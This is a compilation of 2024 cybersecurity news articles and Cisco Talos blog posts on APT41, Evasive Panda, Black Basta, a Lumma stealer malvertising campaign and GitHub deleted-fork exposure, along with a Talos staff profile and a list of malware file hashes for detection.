The APT used DNS poisoning to install the Macma backdoor on targeted networks and then deliver malware to steal data via post-exploitation activity.

Source: Pawel Opaska via Alamy Stock Photo

Researchers have found that a China-linked advanced persistent threat (APT) group compromised an Internet service provider (ISP) to exploit software vendor update mechanisms using DNS poisoning. The attacks delivered new variants of the Macma backdoor, as well as post-exploitation malware to exfiltrate sensitive data from compromised networks.

Researchers at Volexity discovered the attack by Evasive Panda, a threat group they track as StormBamboo and that also goes by DaggerFly, when they detected multiple systems becoming infected with malware in mid-2023, they revealed in a recent blog post. The researchers eventually tracked the attacks to the highly active Chinese APT, which they found altering DNS query responses for specific domains tied to automatic software update channels for software vendors, they said.

"StormBamboo appeared to target software that used insecure update mechanisms, such as HTTP, and did not properly validate digital signatures of installers," Volexity researchers Ankur Saini, Paul Rascagneres, Steven Adair, and Thomas Lancaster wrote in the post. "Therefore, when these applications went to retrieve their updates, instead of installing the intended update, they would install malware, including but not limited to Macma and Pocostick (aka MGBot)."

Macma is a backdoor that's often used by Evasive Panda and was first detailed by Google TAG in 2021, though it was used for a number of years before discovery. The latest variant demonstrates the group converging development of both Macma and Gimmick MacOS malware, according to Volexity. The researchers also detected post-exploitation activity to deploy the malicious browser extension Reloadext to exfiltrate victim mail data, they said.

**Poisoning DNS Requests**

Volexity outlined one of several incidents that researchers investigated in which Evasive Panda used DNS poisoning to deliver malware via an HTTP automatic update mechanism. The attack poisoned responses for legitimate hostnames that were then used as second-stage command-and-control (C2) servers, the researchers said.

DNS poisoning is a type of DNS abuse in which an attacker poisons DNS records to reroute network communications to a server under their control to steal and manipulate information transmitted to users. In this case, the APT used the poisoned DNS records to resolve to an attacker-controlled server in Hong Kong at IP address 103.96.130.107, which was at the ISP level of the targeted organization.

The logic behind the abuse of automatic updates is the same for all the applications targeted, the researchers noted. The legitimate application performs an HTTP request to retrieve a text-based file containing the latest application version and a link to the installer.

"Since the attacker has control of the DNS responses for any given DNS name, they abuse this design, redirecting the HTTP request to a C2 server they control hosting a forged text file and a malicious installer," the researchers wrote.

In the attacks, the APT targeted multiple software vendors with "insecure update workflows" that use varying levels of complexity in their steps for pushing malware. For example, one of the vendors, 5Kplayer, uses a workflow, the binary of which automatically checks if a new version of YoutubeDL is available for each time the application is started.

If a new version is available, the process downloads it from the specified URL, and then the legitimate app executes it. In its attack, Evasive Panda used DNS poisoning to host a modified config file indicating a new update was available, which resulted in the YoutubeDL software downloading an upgrade package from the APT's server that had already been backdoored with malicious code.

**Beware: "Highly Skilled" APT at Work**

Volexity notified and worked with the ISP whose network was being used for DNS poisoning. The ISP investigated and took various network components offline, which stopped the malicious activity, the researchers said.

"During this time, it was not possible to pinpoint a specific device that was compromised, but various components of the infrastructure were updated or left offline and the activity ceased," they wrote.

The attacks are not the first time Evasive Panda, which often targets organizations across Asia that are interested in the Chinese state, has leveraged legit software update channels for nefarious purposes.

In April of last year, researchers from ESET discovered cyberespionage attacks in which the group targeted individuals in China and Nigeria by hijacking update channels for software developed by Chinese companies to deliver the MGBot malware to steal credentials and data.

Indeed, the group is "a highly skilled and aggressive threat actor" that often "compromises third parties to breach intended targets," the researchers warned.

"The variety of malware employed in various campaigns by this threat actor indicates significant effort is invested, with actively supported payloads for not only macOS and Windows, but also network appliances," they wrote.

The attacks also are related to previous research by ESET concerning the infection vector for the Pocostick malware that also used DNS poisoning to abuse automatic updates, as well as one used by a related APT DriftingBamboo following zero-day exploitation of Sophos firewalls, the researchers noted.

Volexity included a link to various rules and indicators of compromise (IOCs) in its post to help organizations detect if they have been affected by the malicious activity.

**About the Author**

Elizabeth Montalbano is a freelance writer, journalist, and therapeutic writing mentor with more than 25 years of professional experience. Her areas of expertise include technology, business, and culture. Elizabeth previously lived and worked as a full-time journalist in Phoenix, San Francisco, and New York City; she currently resides in a village on the southwest coast of Portugal. In her free time, she enjoys surfing, hiking with her dogs, traveling, playing music, yoga, and cooking.

China's Evasive Panda Attacks ISP to Send Malicious Software Updates

Pentney and his team are threat hunters and researchers who contribute to Talos’ research and reports shared with government and private sector partners.

Monday, August 5, 2024 08:00

As the adage goes: “You don’t know what you don’t know.” 

For Ryan Pentney and his team, they know what they don’t know. And they wake up every morning trying to figure out how they can answer those questions about emerging threats and some of the largest state-sponsored actors in the world. 

Pentney is Cisco Talos’ threat intelligence lead for the Asia-Pacific region, and it's his job to lead investigations into active malware threats, international threat groups and anything that’s on defenders’ minds.  

“We’re always thinking about, ‘What do we know, and what do we not know?’ And we try to start with the 'What do we know?' part,” Pentney said. “What do I need to answer these questions? Do we need to look at other methods or new tools for generating information? Are there partners we want to have discussions with?” 

Pentney and his team are threat hunters and researchers who contribute to Talos’ research and reports shared with government and private sector partners. He is specifically focused on the tactics threat actors used to perform these attacks and their potential motivations.  

“How can we figure out how to identify the actor in the future if they’re involved in other attacks? Do they have specific targets, or is it more widespread?” Pentney said. “At the end of the day, we try to figure out what we need to do to keep our customers safe.” 

But this is only the latest stop on Pentney’s journey through Talos and its predecessor, Sourcefire. In fact, Pentney joined Sourcefire almost immediately after graduating college, his first “real” job in the cybersecurity field. 

Over the past 17 years at Sourcefire and Talos, he’s done everything from vulnerability research and discovery to Snort rule writing and application development.  

His first role at Sourcefire was working under Lurene Grenier. At the time, it was only a group of six people working on detection inside Sourcefire’s Vulnerability Research Team (VRT) writing rules and signatures for the Snort intrusion prevention system and ClamAV anti-virus software. Pentney attended college studying in the broader field of computer science, learning how to write in the C and C++ languages, but at the time, “cybersecurity-focused programs weren't common,” Pentney says.  

__Pentney (second from left) was once part of a hockey team with some of his Sourcefire/Talos colleagues.__

So, much of his education had to come on the job. 

“When new vulnerabilities came out, we would sometimes need to reverse-engineer the patches to figure out what changes had taken place, and from there figure out what the original vector might have been,” he said. 

Eventually, he moved to the vulnerability research team, where he spent years searching for vulnerabilities in a wide range of products and software and disclosing potential exploitation vectors to vendors so they could be patched. 

Then, in 2015, he joined the threat hunting team under Matt Olney, who was also one of Pentney’s original Sourcefire colleagues.  

__Pentney speaking at a conference in 2016.__

During his Sourcefire days, Pentney says he is most proud of working on Razorback, an open-source framework inside Snort that enabled the advanced processing of data to protect against client-side attacks.  

His work on Razorback deepened Pentney’s interest in how exploits work and how adversaries write exploits in the first place, all things that Lurene helped teach him. Pentney even ended up advancing to the point that, for many years, he taught Talos’ in-house Exploit Development Class for customers and employees. 

“I still very much enjoy teaching whenever I get the opportunity,” Pentney said. 

When Pentney joined Sourcefire in 2008, he was only part of a team of less than 10 people where he was a solo contributor. Now, Talos is made up of more than 500 people and manages a team of 10.  

“We’ve greatly expanded our areas of focus, we have a lot of varied teams that specialize in a lot of different things, and we have our own branding and our own set of folks in charge of that,” Pentney said of Talos’ growth over the past 10 years. “It feels normal now, but I think I would have been overwhelmed if you had told me 16 years ago that we’d be working on the kinds of things we’re working on now.” 

Several things have kept Pentney at the company for almost 17 years, much of which centered around his ability to pivot between different roles in the company and learn along the way. Even today, Pentney says there is always someone at Talos he’s looking to learn from. 

From day one on the job, Pentney joked that “there were so many experts, I knew they were speaking English, but I didn’t recognize how the information was put together.” And now he’s advanced enough to the point that he is working on major international events and incidents, and now is the one disseminating that information to partners, customers and users. 

The key to Talos’ success over the years while expanding in scope and size is that management has always encouraged everyone at the company to learn and grow, Pentney said. He also fondly looks back on the many opportunities to bond with the original team at Sourcefire who are still at Talos today, including many people on the Network threat Detection and Response team who taught Pentney how to write Snort rules in the first place. 

“The overall level of expertise you can find anywhere at Talos, the openness of people in terms of wanting to share that with you if you’re interested, the teaching mentality that people have, has always been amazing,” Pentney said. “Management has always been very supportive of that, of personal growth, and expanding your mindset.” 

Looking forward into the next 10 years of Talos, Pentney said he plans on learning more about state-sponsored activity and researching new ways to track larger threat actors.  

“We are looking at leveraging our telemetry in ways that we had never considered before. There are mathematical and statistical methods we may be able to use to uncover some insights that may not be obvious,” he said.  

Outside of the office, Pentney is an avid skier and tries to take one trip out to the Rocky Mountains every year with a group of friends. And, he joked “like most of us at Talos” he enjoys playing video games. 

He also enjoys studying and learning new languages (a common talent among the Talos Threat Intelligence and Interdiction team) and speaks four languages fluently.  

__Pentney (second from left) and other Talos threat hunters gather for a team offsite in 2023.__

One thing many of his teammates, even the original Sourcefire ones, don’t know about him is that he likes to play the piano.  

“That’s something I find really relaxing and I don’t get to show off enough. It’s a really nice, meditative activity,” he said.  

If you’d like to look at some of the work Pentney and his team have completed recently, they regularly contribute to the Talos Incident Response Quarterly Trends reports and conduct intelligence on-demand requests through a Cisco Talos Incident Response retainer.

Ryan Pentney reflects on 10 years of Talos and his many roles from the Sourcefire days

The state-sponsored Chinese threat actor gained access to three systems and stole at least some research data around computing and related technologies.

Source: Christophe Coat via Alamy Stock Photo

China-linked advanced persistent threat group APT41 appears to have compromised a government-affiliated institute in Taiwan that conducts research on advanced computing and associated technologies.

The intrusion began in July 2023, with the threat actor gaining initial access to the victim environment via undetermined means. Since then, it has deployed multiple malware tools, including the well-known ShadowPad remote access Trojan (RAT), the Cobalt Strike post compromise tool, and a custom loader for injecting malware using a 2018 Windows remote code execution vulnerability (CVE-2018-0824).

APT41 is an attribution that several vendors use to track a loose collective of China-nexus threat groups that have been engaged in a broad range of cyber espionage and financially motivated cyberattacks around the world, going back to 2012. Members of the group such as Wicked Panda, Winnti, Barium, and SuckFly have plundered and pillaged trade secrets, intellectual property, and other sensitive data from organizations in the US and multiple other countries in recent years.

Most recently, Mandiant reported observing members of the group targeting global shipping and logistics companies and organizations in the technology, entertainment, and automotive sectors. The US government indicted several members of the Chengdu-based APT41 in 2020, though that has done little slow it down.

**Academic Research: A Valuable Cyber Target**

Researchers at Cisco Talos discovered the intrusion when investigating abnormal activity involving attempts to download and execute PowerShell scripts in the Taiwan research institute's network environment last year.  

"The nature of research-and-development work carried out by the entity makes it a valuable target for threat actors dedicated to obtaining proprietary and sensitive technologies of interest to them," Talos researchers Joey Chen, Ashley Shen, and Vitor Ventura said in a report this week. Over the course of the intrusion, APT41 actors broke into three systems in the target environment and stole at least some documents from there, they said.

ShadowPad is malware that researchers first discovered embedded in the source code of NetSarang Computer's Xmanager server management software back in 2017. That supply chain attack impacted several NetSarang customers in the APAC region. Initially, researchers believed that APT41 was the sole user of the backdoor. Over the years however, they have identified multiple groups — all of them China-linked — that have used the RAT in numerous cyber-espionage campaigns and software supply chain attacks.

With the attack on the Taiwanese research institute, APT41 used two different ShadowPad iterations — one that leveraged a previously known packing mechanism called "ScatterBee," and another that used an outdated and vulnerable version of Microsoft Input Method Editors (IME), the Cisco Talos researchers said.

**ShadowPad & Cobalt Strike Anchor Espionage Effort**

The attackers used ShadowPad to run commands for mapping out the victim network, collecting data on hosts, and trying to find other exploitable systems on the same network. Cisco Talos also found the APT harvesting passwords and user credentials stored in Web browsers from the compromised environment, using tools such as Mimikatz and WebBrowserPassView.

"From the environment the actor executes several commands, including using 'net,' 'whoami,' 'quser,' 'ipconfig,' 'netstat,' and 'dir' commands to obtain information on user accounts, directory structure, and network configurations from the compromised systems," the researchers said. "In addition, we also observed query to the registry key to get the current state of software inventory collection on the system."

As part of their attack chain, the threat actors also deployed the Cobalt Strike post compromise tool on the victim network using a loader they cloned from a GitHub project. It's designed to evade antivirus detection tools.

"It’s important to highlight that this Cobalt Strike beacon shellcode used steganography to hide in a picture and executed by this loader," the researchers said. "In other words, its download, decryption, and execution routines all happen in runtime in memory."

**About the Author**

Jai Vijayan is a seasoned technology reporter with over 20 years of experience in IT trade journalism. He was most recently a Senior Editor at Computerworld, where he covered information security and data privacy issues for the publication. Over the course of his 20-year career at Computerworld, Jai also covered a variety of other technology topics, including big data, Hadoop, Internet of Things, e-voting, and data analytics. Prior to Computerworld, Jai covered technology issues for The Economic Times in Bangalore, India. Jai has a Master's degree in Statistics and lives in Naperville, Ill.

China's APT41 Targets Taiwan Research Institute for Cyber Espionage

A Taiwanese government-affiliated research institute that specializes in computing and associated technologies was breached by nation-state threat actors with ties to China, according to new findings from Cisco Talos.
The unnamed organization was targeted as early as mid-July 2023 to deliver a variety of backdoors and post-compromise tools like ShadowPad and Cobalt Strike. It has been attributed

Cyber Espionage / Malware

A Taiwanese government-affiliated research institute that specializes in computing and associated technologies was breached by nation-state threat actors with ties to China, according to new findings from Cisco Talos.

The unnamed organization was targeted as early as mid-July 2023 to deliver a variety of backdoors and post-compromise tools like ShadowPad and Cobalt Strike. It has been attributed with medium confidence to a prolific hacking group tracked as APT41.

"The ShadowPad malware used in the current campaign exploited an outdated vulnerable version of Microsoft Office IME binary as a loader to load the customized second-stage loader for launching the payload," security researchers Joey Chen, Ashley Shen, and Vitor Ventura said.

"The threat actor compromised three hosts in the targeted environment and was able to exfiltrate some documents from the network."

Cisco Talos said it discovered the activity in August 2023 after detecting what it described were "abnormal PowerShell commands" that connected to an IP address to download and execute PowerShell scripts within the compromised environment.

The exact initial access vector used in the attack is not known, although it involved the use of a web shell to maintain persistent access and drop additional payloads like ShadowPad and Cobalt Strike, with the latter delivered by means a Go-based Cobalt Strike loader named CS-Avoid-Killing.

"The Cobalt Strike malware had been developed using an anti-AV loader to bypass AV detection and avoid the security product quarantine," the researchers said.

Alternately, the threat actor was observed running PowerShell commands to launch scripts responsible for running ShadowPad in memory and fetch Cobalt Strike malware from a compromised command-and-control (C2) server. The DLL-based ShadowPad loader, also called ScatterBee, is executed via DLL side-loading.

Some of the other steps carried out as part of the intrusion comprised the use of Mimikatz to extract passwords and the execution of several commands to gather information on user accounts, directory structure, and network configurations.

"APT41 created a tailored loader to inject a proof-of-concept for CVE-2018-0824 directly into memory, utilizing a remote code execution vulnerability to achieve local privilege escalation," Talos said, noting the final payload, UnmarshalPwn, is unleashed after passing through three different stages.

The cybersecurity outfit also pointed out the adversary's attempts to avoid detection by halting its own activity upon detecting other users on the system. "Once the backdoors are deployed the malicious actor will delete the web shell and guest account that allowed the initial access," the researchers said.

The disclosure comes as Germany revealed earlier this week that Chinese state actors were behind a 2021 cyber attack on the country's national mapping agency, the Federal Office of Cartography and Geodesy (BKG), for espionage purposes.

Responding to the allegations, China's embassy in Berlin said the accusation is unfounded and called on Germany "to stop the practice of using cybersecurity issues to smear China politically and in the media."

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

APT41 Hackers Use ShadowPad, Cobalt Strike in Taiwanese Institute Cyber Attack

The prolific ransomware group has shifted away from phishing as the method of entry into corporate networks, and is now using initial access brokers as well as its own tools to optimize its most recent attacks.

Source: Ciaobucarest via Alamy Stock Photo

The enormously successful Black Basta ransomware group has pivoted to using new custom tools and initial access techniques as part of a shift in strategy in the wake of last year's takedown of the Qakbot botnet.

The evolution of the group, which has compromised more than 500 victims and counting, demonstrates the resilience of threat groups who have had to shift tactics on the fly due to law enforcement and other disruptions, yet still somehow continue to flourish in their cybercriminal operations, experts said.

Black Basta's initial claim to fame was its prolific use of Qakbot, which it distributed via sophisticated and evolving phishing campaigns. As an initial access Trojan, Qakbot could then deploy a host of publicly available open source tools and ultimately the gang's namesake ransomware. However, about a year ago, the Qakbot botnet was largely put out of commission (though it has since reappeared) in a federal law-enforcement campaign called Operation Duck Hunt, forcing the group to find new modes of access to victim infrastructure.

Initially, Black Basta continued to use phishing and even vishing to deliver other types of malware, such as Darkgate and Pikabot, but quickly began seeking alternatives to conduct further malicious activity, researchers from Mandiant revealed in a blog post this week.

The group, which Mandiant tracks as UNC4393, has now settled into a "transition from readily available tools to custom malware development as well as \[an\] evolving reliance on access brokers and diversification of initial access techniques" in recent attacks, Mandiant researchers wrote in the post.

**'SilentNight' Resurgence**

One of the new methods for initial access involves the deployment of a backdoor called SilentNight, which the group used in 2019 and 2021, respectively, before putting it on the shelf until last year. Earlier this year, the group began using it again in malvertising efforts, the researchers said, marking "a notable shift away from phishing," which previously was the “only known means of initial access,” they wrote in the post.

SilentNight is a C/C++ backdoor that communicates via HTTP/HTTPS and may utilize a domain generation algorithm for command and control (C2). It has a modular framework that allows for plug-ins to provide "versatile functionality, including system control, screenshot capture, keylogging, file management, and cryptocurrency wallet access," the researchers wrote. It also targets credentials through browser manipulation.

Once Black Basta gains access to target environments, the group uses a combo of living-off-the-land (LotL) techniques and an assortment of custom malware for persistence and lateral movement before deploying ransomware, the researchers found.

"UNC4393's goal is to gather as much data as quickly as possible followed by exfiltration of the collected data to engage in multi-faceted extortion, leveraging the threat of data leakage to pressure victims into paying ransom demands," the researchers noted.

**Custom Tools to Optimize Attacks**

One of the first new tools deployed after gaining initial access is called Cogscan, which seems to have replaced open source tools previously used by the group, such as Bloodhound, Adfind, and PSNmap to help map out victim networks and identify opportunities for either lateral movement or privilege escalation.

Cogscan is a .NET reconnaissance tool used to enumerate hosts on a network and gather system information, and is internally referred to as "GetOnlineComputers" by Black Basta itself, the researchers observed.

Another notable new tool that allows Black Basta to speed up its deployment of ransomware is Knotrock, a .NET-based utility. Knotrock creates a symbolic link on network shares specified in a local text file; after creating each symbolic link, Knotrock executes a ransomware executable and provides it with the path to the newly created symbolic link.

"Ultimately, Knotrock serves a dual purpose: it assists the existing Basta encryptor by providing network-communication capabilities, and streamlines operations by proactively mapping out viable network paths, thereby reducing deployment time and accelerating the encryption process," the Mandiant researchers wrote.

The malware represents an evolution in UNC4393's operations in that it boosts its capabilities "by expediting the encryption process to enable larger-scale attacks and significantly decreasing its time to ransom," they noted.

Other new tools observed in recent attacks include tunneling technology for command-and-control (C2) communications dubbed Portyard, and a memory-only dropper that decrypts an embedded resource into memory called DawnCry, the researchers said.

**Black Basta: A Significant Threat Remains**

Changes to Black Basta’s initial access and tooling demonstrate a "resilience" in the group that shows it will continue to remain a threat against "organizations of all sizes," even if it’s moving away from phishing, which is one of the most successful forms of cybercrime, one security expert noted.

"Given the success of this gang, there's no doubt they have a considerable amount of funds stocked away in their war chest, allowing them to develop their own tools and improve their ability to attack," says Erich Kron, security awareness advocate at security firm KnowBe4.

Indeed, Black Basta’s ability to adapt and innovate in its use of new tools and techniques means that defenders, too, also must be proactive and fortify their security measures with the latest technology and threat intelligence available, the Mandiant researchers said.

Defensive measures for organizations Kron recommends include "employee education and training to counter social engineering; strong data loss prevention controls to keep data from being stolen; a good endpoint detection and response system that can possibly spot and stop attempts to encrypt files from infected computers; and immutable and tested backups to allow for quick recovery in the event of system encryption."

**About the Author**

Elizabeth Montalbano is a freelance writer, journalist, and therapeutic writing mentor with more than 25 years of professional experience. Her areas of expertise include technology, business, and culture. Elizabeth previously lived and worked as a full-time journalist in Phoenix, San Francisco, and New York City; she currently resides in a village on the southwest coast of Portugal. In her free time, she enjoys surfing, hiking with her dogs, traveling, playing music, yoga, and cooking.

Black Basta Develops Custom Malware in Wake of Qakbot Takedown

A malvertising campaign uses phishing to steal legitimate account pages, with the endgame of delivering the Lumma stealer.

Source: Hocus Focus Studio via iStock

Attackers are hijacking pages on Facebook to lure victims into downloading a legitimate artificial intelligence (AI) photo editor, but then serving up a widely distributed infostealer to rob users of their credentials instead.

The malvertising campaign, discovered by researchers at Trend Micro, exploits the popularity of AI and combines a variety of popular threat tactics, including phishing, social engineering, and the use a legitimate utility in a malicious way. The ultimate payload is the Lumma stealer, which targets sensitive information, including user credentials, system details, browser data, and extensions.

The attack hinges on the abuse of paid Facebook promotions, which attackers have leveraged to lure users into engagement and ultimately deliver malware, the researchers noted in a blog post today.

“Once the attacker gains control of the page, ads are posted promoting the AI photo editor, leading victims to download an endpoint management utility disguised as the photo editor,” Trend Micro threat researcher Jaromir Horejsi wrote.

Attackers also are taking advantage of the current attention on AI technology and tools associated with it by using these tools "as lures for malicious activities, which includes phishing scams, deepfakes, and automated attacks," he wrote.

So far, the malicious package associated with the campaign has generated about 16,000 downloads on Windows and 1,200 on macOS. However, the macOS version redirects to the Apple website instead of an attacker-controlled site, suggesting that attackers are only targeting Windows users with the campaign.

**Phishing Leads to Hijacked Pages**

A typical attack in the campaign starts before a potential victim even sees an ad. Attackers begin by sending phishing messages to owners of the targeted social media page to gain control of the page for their own malicious use. The sender account typically looks like an empty profile with randomly generated user names.

The phishing links in the messages are sent either as direct links or personalized link pages, such as linkup.top, bio.link, s.id, and linkbio.co, among others. Sometimes attackers even abuse Facebook's open redirect URL for these links to appear more legitimate.

If the page operator clicks on the links, they are presented with a screen to verify their information with a "Business Support Center" for Meta developers. Clicking on that screen's "Verify Your Information Here" link leads to a fake account protection page, "which in several subsequent steps, asks users for the information necessary to log in and take over their account, such as their phone number, email address, birthday, and password," Horejsi explained.

After the target provides this info, the attacker steals the profile and begins creating and posting malicious ads for an AI photo editor with links to a fake domain that uses the name of a legitimate tool, such as Evoto.

"The fake photo editor web page looks very similar to the original one, which helps in tricking the victim into thinking that they are downloading a photo editor," Horejsi wrote.

However, what a user who takes the bait actually downloads is the freely available ITarian endpoint management software. The attacker, using a series of back-end processes controls, ultimately controls the victim's machine to download the final payload, the Lumma stealer.

**Avoiding Compromise**

There are a number of ways that people can avoid falling victim to the campaign and threats that abuse social media pages, which not only can compromise users but also lead to secondary attacks via stolen credentials that act as initial entry into enterprise infrastructure, according to Trend Micro.

Social-media users should enable multifactor authentication on all their accounts to add an extra layer of protection against unauthorized access, as well as regularly update and use strong, unique passwords across all accounts.

Organizations also should regularly practice education and awareness to let their employees know of the dangers lurking on social media while accessing corporate networks, as well as how to identify suspicious messages and links associated with phishing attacks.

Finally, both organizations and individual users should monitor their accounts for any unusual behavior, such as unexpected login attempts or changes to account information. Organizations should employ some kind of detection and response mechanisms.

**About the Author**

Elizabeth Montalbano is a freelance writer, journalist, and therapeutic writing mentor with more than 25 years of professional experience. Her areas of expertise include technology, business, and culture. Elizabeth previously lived and worked as a full-time journalist in Phoenix, San Francisco, and New York City; she currently resides in a village on the southwest coast of Portugal. In her free time, she enjoys surfing, hiking with her dogs, traveling, playing music, yoga, and cooking.

Attackers Hijack Facebook Pages, Promote Malicious AI Photo Editor

The lesson for users, especially if you’re a private company that primarily uses GitHub, is just to understand the inherent dangers of using open-source software.

Thursday, August 1, 2024 14:00

A recently discovered security issue in GitHub and other, similar, control system products seem to fit into the classic “it’s a feature, not a bug” category. 

Security researchers last week published their findings into some research of how deleted forks in GitHub work, potentially leaving the door open for a malicious actor to steal a project key and then view deleted forks and versions of any project on GitHub. 

This may not necessarily even be a \*new\* discovery, because users on social media were quick to point out that these products have always been designed this way, so it’s not like a new sort of exploit had just been published. But the publishing of these findings came after Truffle Security says a major tech company accidentally leaked a private key for an employee GitHub account, and despite totally deleting the repo thinking that would take care of the leak, it was still exposed and accessed by potentially malicious users.  

This potential issue has not been tested in similar software like GitLab or Bitbucket, but conceivably, they’ve all been designed in the same way. The major difference for GitHub is that deleted or unpublished commits can be downloaded via a fork if the user has the correct identifying hash (or at least a portion of it).  

The issue here is there is no real patch or fix to address this issue, and now it’s widely known and been publicized on the internet.  

GitHub told The Register that this is part of how the software is designed, and there doesn’t appear any efforts underway to change that. 

“GitHub is committed to investigating reported security issues. We are aware of this report and have validated that this is expected and documented behavior inherent to how fork networks work. You can read more about how deleting or changing visibility affects repository forks in our documentation,” the company said in a statement to online publication The Register. 

The lesson for users, especially if you’re a private company that primarily uses GitHub, is just to understand the inherent dangers of using open-source software like those projects that are created and managed on GitHub. (Martin Lee and I will be discussing more in tomorrow morning’s episode of Talos Takes.) 

The other option is that, if you’re a GitHub user and at some point, published a key, you should probably just assume someone has copied it by now. That means not only deleting references to that key but rotating the key and checking if it was used improperly.  

**The one big thing **

Cisco Talos recently discovered a malicious campaign that compromised a Taiwanese Government Affiliated Research Institute that started as early as July 2023, delivering Shadowpad malware, Cobalt Strike and other customized tools for post-compromise activities. The activity conducted on the victim endpoint matches the Chinese hacking group APT41. The combined use of malware, open-source tools and projects procedures and post-compromise activity matches this group method of operation. ShadowPad, widely considered the successor of PlugX, is a modular remote-access-trojan (RAT) only seen sold to Chinese hacking groups. 

**Why do I care? **

APT41 is a prolific and dangerous threat actor that all users and cybersecurity practitioners should be keeping track of. The group, also known as Amoeba, Bronze Atlas, Wicked Spider, and more, is known for carrying out Chinese state-sponsored espionage activity and other financially motivated cybercrimes. We have also uncovered that APT41 created a tailored loader to inject a proof of concept for CVE-2018-0824, a remote code execution vulnerability in Microsoft COM for Windows, directly into memory to achieve local privilege escalation. 

**So now what? **

This threat actor commonly tries to exploit CVE-2018-0824, which Microsoft has long had a patch available for. Users should ensure all Windows systems are up to date to the latest version to protect against this vulnerability (and the hundreds of others that exist in Windows anyway!). Additionally, Talos has released new ClamAV signatures and Snort rules to detect the ShadowPad malware and Cobalt Strike beacons used by APT41.  

**Top security headlines of the week **

**Another Microsoft outage just days after the massive CrowdStrike-related incident was the result of a cyber attack, according to the company.** The outage Wednesday morning affected Microsoft Outlook and the video game “Minecraft” for almost 10 hours and forced thousands of users to report issues. The incident gained increased interest in the wake of a massive outage last weekend that resulted in international disruptions and tens of millions of dollars in damages. Microsoft stated after the outage was resolved that the initial issue was caused by a distributed denial-of-service attack, and additional mitigations to defend against that DDoS attack failed. A notification on Microsoft’s website said the outage affected Microsoft Azure, the cloud platform that powers many of its services, and Microsoft 365. It also said cloud systems Intune and Entra were affected. Even though Microsoft had no direct involvement in the previous outage, the company has been under a microscope since the incident. That outage was caused by a faulty update to CrowdStrike Falcon that was pushed to many versions of Windows 11. (BBC, Forbes) 

**A new version of the Mandrake Android spyware appears to be spreading through phony apps on the Google Play store.** The revised spyware, used to unknowingly track users’ location and activity on their mobile devices, has been downloaded more than 32,000 times since 2022, according to new research. The original version of Mandrake was active between two periods, one in 2016 and 2017 and another between 2018 and 2020. Besides the usual spyware functions, Mandrake can completely wipe a device with a killswitch, leaving no trace of the malware. Spyware commonly targets highly vulnerable individuals, including politicians, activists and journalists. Spouses and romantic partners may also use it to unknowingly track their significant others. The most popular fake app used was AirFS, an advertised file-sharing app, that was downloaded more than 30,000 times before it was removed from the Google Play store. Once the user installs the phony app, the Mandrake malware is unknowingly installed, and it asks for the user’s permission to draw overlays on their screen under the guise of the illegitimate app. (Bleeping Computer, Security Affairs) 

**North Korean APT Andariel is accused of carrying out a series of espionage-focused campaigns targeting U.S. weapon systems over the past two years.** Security researchers say the state-sponsored group targeted healthcare providers, defense contractors and nuclear facilities, possibly to steal information that could improve the country’s own weapons programs. North Korea is constantly using its posession of nuclear weapons to try and intimidate Western countries. Separately, the U.S. indicted a North Korean citizen for his alleged involvement in several cyber attacks against American hospitals. The individual, suspected of having ties to North Korea’s Reconnaissance General Bureau, allegedly targeted hospitals in Florida and Kansas, healthcare providers in Arkansas and Connecticut, and a clinic in Colorado. The U.S. State Department is offering a reward of up to $10 million for information that leads to the arrest of Rim Jong Hyok. (The Record, CNN) 

**Can’t get enough Talos? **

*   Ransomware and email attacks are hitting businesses more than ever before 
*   Cisco Talos: An oral history 
*   Vulnerability Roundup: Out-of-bounds read vulnerability in NVIDIA driver; Open-source flashcard software contains multiple security issues 
*   Talos Takes Ep. #192: Threat actor trends and the most prevalent malware from the past quarter 

**Upcoming events where you can find Talos **

**_BlackHat USA_** **_(Aug. 3 – 8)_** 

_Las Vegas, Nevada_ 

**_Defcon_** **_(Aug. 8 – 11)_** 

_Las Vegas, Nevada_ 

**_BSides Krakow_** **_(Sept. 14)_**  

_Krakow, Poland_ 

**Most prevalent malware files from Talos telemetry over the past week **

**SHA 256:** 9f1f11a708d393e0a4109ae189bc64f1f3e312653dcf317a2bd406f18ffcc507  
**MD5:** 2915b3f8b703eb744fc54c81f4a9c67f f  
**Typical Filename:** VID001.exe  
**Claimed Product:** N/A  
**Detection Name:** Win.Worm.Coinminer::1201

**SHA 256:** c67b03c0a91eaefffd2f2c79b5c26a2648b8d3c19a22cadf35453455ff08ead0  
**MD5:** 8c69830a50fb85d8a794fa46643493b2  
**Typical Filename:** AAct.exe  
**Claimed Product:** N/A  
**Detection Name:** PUA.Win.Dropper.Generic::1201

**SHA 256:** 161937ed1502c491748d055287898dd37af96405aeff48c2500b834f6739e72d  
**MD5:** fd743b55d530e0468805de0e83758fe9  
**Typical Filename:** KMSAuto Net.exe  
**Claimed Product:** KMSAuto Net  
**Detection Name:** W32.File.MalParent

**SHA 256:** 24283c2eda68c559f85db7bf7ccfe3f81e2c7dfc98a304b2056f1a7c053594fe  
**MD5:** 49ae44d48c8ff0ee1b23a310cb2ecf5a  
**Typical Filename:** nYzVlQyRnQmDcXk  
**Claimed Product:** N/A  
**Detection Name:** Win.Dropper.Scar::tpd

**SHA 256:** bea312ccbc8a912d4322b45ea64d69bb3add4d818fd1eb7723260b11d76a138a  
**MD5:** 200206279107f4a2bb1832e3fcd7d64c  
**Typical Filename:** lsgkozfm.bat  
**Claimed Product:** N/A  
**Detection Name:** Win.Dropper.Scar::tpd

There is no real fix to the security issues recently found in GitHub and other similar software

ShadowPad, widely considered the successor of PlugX, is a modular remote access trojan (RAT) only seen sold to Chinese hacking groups.

Thursday, August 1, 2024 08:00

*   Cisco Talos discovered a malicious campaign that compromised a Taiwanese government-affiliated research institute that started as early as July 2023, delivering the ShadowPad malware, Cobalt Strike and other customized tools for post-compromise activities.
*   The activity conducted on the victim endpoint matches the hacking group APT41, alleged by the U.S. government to be comprised of Chinese nationals. Talos assesses with medium confidence that the combined usage of malware, open-source tools and projects, procedures and post-compromise activity matches this group’s usual methods of operation.
*   The ShadowPad malware used in the current campaign exploited an outdated vulnerable version of Microsoft Office IME binary as a loader to load the customized second-stage loader for launching the payload.
*   We also discovered that APT41 created a tailored loader to inject a proof-of-concept for CVE-2018-0824 directly into memory, utilizing a remote code execution vulnerability to achieve local privilege escalation.

**Taiwanese Government-Affiliated Research Institute compromised by Chinese Actor**

